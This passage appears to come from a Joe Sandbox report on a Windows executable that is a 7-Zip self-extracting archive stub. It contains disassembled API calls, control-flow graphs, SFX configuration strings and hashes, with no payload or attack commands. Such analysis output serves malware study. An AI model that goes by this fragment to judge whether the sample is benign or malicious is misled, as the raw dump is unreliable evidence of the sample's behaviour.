                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                                                                    • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                                                    • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                                                    • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                                                    • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                                                    • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                                                                  • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                                                                  • _wtol.MSVCRT ref: 00405F65
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                                                                  • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                                                                                                  • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                                                                  • API String ID: 154539431-3058303289
                                                                                                                  • Opcode ID: 926e16e0d72d3398af4091c0d2fb4f0e89ce66b1218389f87f1cbe10f28a7287
                                                                                                                  • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                                                                  • Opcode Fuzzy Hash: 926e16e0d72d3398af4091c0d2fb4f0e89ce66b1218389f87f1cbe10f28a7287
                                                                                                                  • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017eb call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 710->697 716 4017f1-4017f3 710->716 715 401804-401809 711->715 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                                                                                                                  • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                                                                  • Opcode Fuzzy Hash: bc4e185761910bab2b3e9b4b194fe0f2484e14367d7febfa53cbc10b96610557
                                                                                                                  • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                                                                  • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1799206407-0
                                                                                                                  • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                                  • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                                                                  • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                                                  • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                                                                  APIs
                                                                                                                  • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                                                                  • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DiskFreeMessageSendSpace
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 696007252-0
                                                                                                                  • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                                                  • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                                                                  • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                                                  • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                  • String ID: HpA
                                                                                                                  • API String ID: 801014965-2938899866
                                                                                                                  • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                                  • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                                                                  • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                                                  • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                                                  • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                                                  • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00401B89
                                                                                                                  • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                                  • String ID: Static
                                                                                                                  • API String ID: 2479445380-2272013587
                                                                                                                  • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                                  • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                                                                  • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                                                  • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                                                                  • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@memcpymemmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3549172513-3916222277
                                                                                                                  • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                                                  • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                                                                  • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                                                  • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                                                    • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                                    • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                                  • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 846840743-0
                                                                                                                  • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                                                  • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                                                                  • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                                                  • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
